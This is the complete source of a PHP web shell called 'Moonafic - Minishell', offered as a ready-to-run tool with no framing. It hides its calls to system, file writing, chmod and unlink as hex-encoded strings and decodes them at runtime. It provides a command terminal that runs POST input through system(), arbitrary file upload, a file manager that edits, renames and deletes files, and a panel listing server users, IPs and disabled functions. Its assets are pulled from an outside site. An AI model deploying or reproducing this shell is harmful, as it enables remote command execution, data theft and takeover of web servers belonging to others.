<?php /* Moonafic - Minishell Version */ set_time_limit(0); error_reporting(0);
$nasi = ['73797374656d', '7068705f756e616d65', '6765745f63757272656e745f75736572', '6765746d79676964', '696e695f676574', '737472746f6c6f776572','66696c655f6765745f636f6e74656e7473', '63686d6f64', '266e6273703b4d616b652077697468', '5f504f5354','5f474554', '5f46494c4553', '6279', '4d6f6f6e61666963', '706870696e666f', '6f625f7374617274', '676574686f737462796e616d65', '73796d6c696e6b', '66696c655f7075745f636f6e74656e7473', '6261736536345f6465636f6465', '676574637764', '657865', '6d6b646972', '6368646972', '726d646972', '756e6c696e6b', '636f7079', '666f70656e', '7363616e646972','69735f7772697461626c65', '69735f7265616461626c65', '706f7369785f6765747077756964', '6667657473', '707265675f6d617463685f616c6c','66696c655f657869737473','667772697465', '72656e616d65', '68746d6c7370656369616c6368617273', '737562737472','737072696e7466', '69735f646972', '66696c6573697a65', '69735f66696c65', '726f756e64', '66696c6574797065','707265675f6d61746368', '66636c6f7365', '66696c656f776e6572',];
$gulung = count($nasi); for($i=0;$i<$gulung;$i++) { $moonafic[] = bebas($nasi[$i]); }
function bebas($rr) { $xx = ''; for($c=0;$c<strlen($rr);$c+=2) { $xx .= chr(hexdec($rr[$c].$rr[$c+1])); } return (string) $xx; }
function perms($file) { $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';}
$info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); return $info; }
if (get_magic_quotes_gpc()) {foreach (${$moonafic[9]} as $key => $value) {${$moonafic[9]}[$key] = stripslashes($value);}}
$sm = (@$moonafic[4]($moonafic[5]("safe_mode")) == 'on') ? "<font color='red'>ON</font>" : "<font color='#000'>OFF</font>";
$ds = (!empty((@$moonafic[4]("disable_functions")))) ? "<font color='red'>". (@$moonafic[4]('disable_functions')) ."</font>" : "<font color='#000'>NONE</font>"; ?>
<html><head><meta charset="UTF-8"><title>Moonafic - Mini</title><meta name="robots" content="noindex,nofollow" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="https://reiz.my.id/Moonafic/src/img/lamp.png" rel="shortcut icon" /><link href="https://reiz.my.id/Moonafic/src/css/style.css" rel="stylesheet"></link><link href="https://reiz.my.id/Moonafic/src/css/bootstrap.min.css" rel="stylesheet"></link><link href="https://reiz.my.id/Moonafic/src/css/font-awesome.css" rel="stylesheet"></link></head>
<body><img src="https://reiz.my.id/Moonafic/src/img/logo-moona.png" /><br /><i>[<a class="iofibrainwash" class="iofibrainwash" href='?'><i class="fa fa-home" aria-hidden="true"></i></a>][
<?php if (isset(${$moonafic[10]}['path'])) {$path = ${$moonafic[10]}['path'];} else {$path = $moonafic[20]();} $path  = str_replace('\\', '/', $path); $paths = explode('/', $path); foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo '<a class="iofibrainwash" href="?path=/">/</a>'; continue; } if ($pat == '') continue; echo '<a class="iofibrainwash" href="?path='; for ($i = 0; $i <= $id; $i++) { echo "$paths[$i]"; if ($i != $id) echo "/"; } echo '">' . $pat . '</a>/';} ?>]</i>
<div style="border: 3px dotted #BF8DF2;" alignt='center' class='tools'>&nbsp;<a class="iofibrainwash" href="?path=<?php echo $path; ?>&moonatul=upload"><i class="fa fa-upload" aria-hidden="true"></i> Upload</a>&nbsp;<br />&nbsp;<a class="iofibrainwash" href="?path=<?php echo $path; ?>&moonatul=terminal"><i class="fa fa-terminal" aria-hidden="true"></i> Terminal</a>&nbsp;<br /></div>
<?php if(${$moonafic[10]}['moonatul'] == 'upload') { if (isset(${$moonafic[11]}['file'])) { if ($moonafic[26](${$moonafic[11]}['file']['tmp_name'], $path . '/' . ${$moonafic[11]}['file']['name'])) { echo '<div class="uploadnotif"><div class="alert alert-success btn-sm" role="alert">success!</div></div>';} else { echo '<div class="uploadnotif"><div class="alert alert-danger btn-sm" role="alert">error!</div></div>';}} echo '<br/><br/><center><div style="width: 400px;"><p><i class="fa fa-upload" aria-hidden="true"></i> Upload File</p><form enctype="multipart/form-data" method="POST"><div class="custom-file"><input onchange="this.form.submit();" name="file" type="file" class="custom-file-input" id="validatedCustomFile" required><label class="custom-file-label" for="validatedCustomFile">Choose file...</label></div></form></div></center>';}
elseif(${$moonafic[10]}['moonatul'] == 'terminal') { echo '<br/><br/><center><div style="width: 400px;"><p><i class="fa fa-terminal" aria-hidden="true"></i> Run Command</p><form method="POST" name="terminal" action=""><div class="form-group"><input placeholder="root@moonafic:~$" type="text" class="form-control" id="exampleFormControlInput1" name="pelabuhan"></div><div class="form-group"><textarea readonly="readonly" class="form-control" id="exampleFormControlTextarea1" rows="3">';if(${$moonafic[9]}["pelabuhan"]) { $moonafic[0](${$moonafic[9]}["pelabuhan"]); }echo '</textarea></div></form></div></center>';} else { ?><div id="mgdl321"><ul id="dltb321"><li><a href="#tab1"><i class="fa fa-list" aria-hidden="true"></i>&nbsp;File Manager</a></li><li><a href="#tab2"><i class="fa fa-info" aria-hidden="true"></i>&nbsp;Server Info</a></li></ul><div id="dlctn321"><div id="tab1">
<?php if (isset(${$moonafic[10]}['filesrc'])) { echo "<b style='color:#BF8DF2;'>Current File :&nbsp;</b>"; echo ${$moonafic[10]}['filesrc']; echo '<br/><br/>'; echo ('<div class="form-group"><textarea readonly="readonly" class="form-control" id="exampleFormControlTextarea1" rows="3">' . $moonafic[37]($moonafic[6](${$moonafic[10]}['filesrc'])) . '</textarea></div>'); }
elseif (isset(${$moonafic[10]}['option']) && ${$moonafic[9]}['opt'] != 'delete') { echo '<b style="color:#BF8DF2;">Current File : </b>' . ${$moonafic[9]}['path'] . '<br /><br />'; if (${$moonafic[9]}['opt'] == 'chmod') {if (isset(${$moonafic[9]}['perm'])) {if ($moonafic[7](${$moonafic[9]}['path'], ${$moonafic[9]}['perm'])) {echo '<div class="alert alert-success" role="alert">Change Permission Done.</div>';} else {echo '<div class="alert alert-danger" role="alert">Change Permission Error.</div>';}} echo '<form method="POST"><input class="form-control" name="perm" type="text" size="4" value="' . $moonafic[38]($moonafic[39]('%o', fileperms(${$moonafic[9]}['path'])), -4) . '" /><input class="form-control" type="hidden" name="path" value="' . ${$moonafic[9]}['path'] . '"><input class="form-control" type="hidden" name="opt" value="chmod"><br/><input class="btn btn-primary" type="submit" value="Submit" /></form>'; }
elseif (${$moonafic[9]}['opt'] == 'rename') { if (isset(${$moonafic[9]}['newname'])) { if ($moonafic[36](${$moonafic[9]}['path'], $path . '/' . ${$moonafic[9]}['newname'])) { echo '<div class="alert alert-success" role="alert">Change Name Done.</div>'; } else { echo '<div class="alert alert-danger" role="alert">Change Name Error.</div>';} ${$moonafic[9]}['name'] = ${$moonafic[9]}['newname']; } echo '<form method="POST"><input class="form-control" name="newname" type="text" size="20" value="' . ${$moonafic[9]}['name'] . '" /><input class="form-control" type="hidden" name="path" value="' . ${$moonafic[9]}['path'] . '"><input class="form-control" type="hidden" name="opt" value="rename"><br/><input class="btn btn-primary" type="submit" value="Submit" /></form>';}
elseif (${$moonafic[9]}['opt'] == 'edit') { if (isset(${$moonafic[9]}['src'])) { $fp = $moonafic[27](${$moonafic[9]}['path'], 'w'); if ($moonafic[35]($fp, ${$moonafic[9]}['src'])) { echo '<div class="alert alert-success" role="alert">Edit File Done.</div>'; } else { echo '<div class="alert alert-danger" role="alert">Edit File Error.</div>'; } $moonafic[46]($fp);} echo '<form method="POST"><textarea class="form-control" cols=80 rows=20 name="src">' . $moonafic[37]($moonafic[6](${$moonafic[9]}['path'])) . '</textarea><br /><input class="form-control" type="hidden" name="path" value="' . ${$moonafic[9]}['path'] . '"><input class="form-control" type="hidden" name="opt" value="edit"><br/><input class="btn btn-primary" type="submit" value="Submit" /></form>';}}
else { echo '<center>'; if (isset(${$moonafic[10]}['option']) && ${$moonafic[9]}['opt'] == 'delete') { if (${$moonafic[9]}['type'] == 'dir') { if ($moonafic[24](${$moonafic[9]}['path'])) { echo '<b><div class="alert alert-success" role="alert">Delete Dir Done.</div></b>'; } else { echo '<b><div class="alert alert-danger" role="alert">Delete Dir Error.</div></b>';}} elseif (${$moonafic[9]}['type'] == 'file') { if ($moonafic[25](${$moonafic[9]}['path'])) { echo '<b><div class="alert alert-success" role="alert">Delete File Done.</div></b>';} else { echo '<b><div class="alert alert-danger" role="alert">Delete File Error.</div></b>'; }}} echo '</center>'; $scandir = (@$moonafic[28]($path)); echo '<div id="content"><table class="table" align="center"><tr class="first"><td><center>Name</center></td><td><center>Size</center></td><td><center>Permissions</center></td><td><center>Options</center></td></tr>';
foreach ($scandir as $dir) { if (!$moonafic[40]("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "<tr><td><a class='iofibrainwash' href=\"?path=$path/$dir\">$dir</a></td><td><center>--</center></td><td><center>"; if ($moonafic[29]("$path/$dir")) echo '<font style="color:green;">'; elseif (!$moonafic[30]("$path/$dir")) echo '<font style="color:red;">'; echo perms("$path/$dir"); if ($moonafic[29]("$path/$dir") || !$moonafic[30]("$path/$dir")) echo '</font>'; echo '</center></td><td><center><form method="POST" action="?option&path='. $path .'"><select onchange="this.form.submit();" name="opt"><option value=""></option><option value="delete">Delete</option><option value="chmod">Chmod</option><option value="rename">Rename</option></select><input type="hidden" name="type" value="dir"><input type="hidden" name="name" value="'. $dir .'"><input type="hidden" name="path" value="'. $path .'/'. $dir .'"></form></center></td></tr>'; }
foreach ($scandir as $file) { if (!$moonafic[42]("$path/$file")) continue; $size = $moonafic[41]("$path/$file") / 1024; $size = $moonafic[43]($size, 3); if ($size >= 1024) { $size = $moonafic[43]($size / 1024, 2) . ' MB'; } else { $size = $size . ' KB'; } echo "<tr><td><a class='iofibrainwash' href=\"?filesrc=$path/$file&path=$path\">$file</a></td><td><center>" . $size . "</center></td><td><center>"; if ($moonafic[29]("$path/$file")) echo '<font style="color:green;">'; elseif (!$moonafic[30]("$path/$file")) echo '<font style="color:red;">'; echo perms("$path/$file"); if ($moonafic[29]("$path/$file") || !$moonafic[30]("$path/$file")) echo '</font>'; echo '</center></td><td><center><form method="POST" action="?option&path='. $path .'"><select onchange="this.form.submit();" name="opt"><option value=""></option><option value="delete">Delete</option><option value="chmod">Chmod</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="'. $file .'"><input type="hidden" name="path" value="'. $path .'/'. $file .'"></form></center></td></tr>';} echo '</table></div>';} ?></div><div id="tab2"><pre>
<b style='color:#BF8DF2;'>User             : </b><?php echo $moonafic[2](); ?><br/>
<b style='color:#BF8DF2;'>Group            : </b><?php echo $moonafic[3](); ?><br/>
<b style='color:#BF8DF2;'>Server IP        : </b><?php echo (@$moonafic[16]($_SERVER['HTTP_HOST'])); ?><br/>
<b style='color:#BF8DF2;'>User IP          : </b><?php echo $_SERVER['REMOTE_ADDR']; ?><br/>
<b style='color:#BF8DF2;'>Safe Mode        : </b><?php echo $sm; ?><br/>
<b style='color:#BF8DF2;'>Disable Function : </b><?php echo $ds; ?><br/>
<b style='color:#BF8DF2;'>Software         : </b><?php echo $_SERVER['SERVER_SOFTWARE']; ?><br/>
<b style='color:#BF8DF2;'>System           : </b><?php echo $moonafic[1](); ?>
</pre></div></div></div><?php } ?><div style="border: 3px dotted #BF8DF2;" class="static"><font><?php echo $moonafic[8]; ?>&nbsp;<font color="#BF8DF2"><i class="fa fa-code"></i></font><?php echo $moonafic[12];?>&nbsp;<a href="https://reiz.my.id/Moonafic/"><?php echo $moonafic[13]; ?></a></font></div>
<script type='text/javascript' src="https://reiz.my.id/Moonafic/src/js/jquery.min.js"></script><script type='text/javascript'> $(".iofibrainwash").click(function (t) { t.preventDefault(); var e = $(this).attr("href"); history.pushState("", "", e), $.get(e, function (t) { $("body").html(t) }) }); </script>
<script type='text/javascript'>jQuery(document).ready(function ($) { $('#dltb321 li:first').addClass('active'); $('#dlctn321 > div').hide(); $('#dlctn321 > div:first').show(); $('#dltb321 a').click(function () { $('#dltb321 li').removeClass('active'); $(this).parent().addClass('active'); var activeTab = $(this).attr('href'); $('#dlctn321 > div:visible').hide(); $(activeTab).show(); return false; }); });</script></body></html>
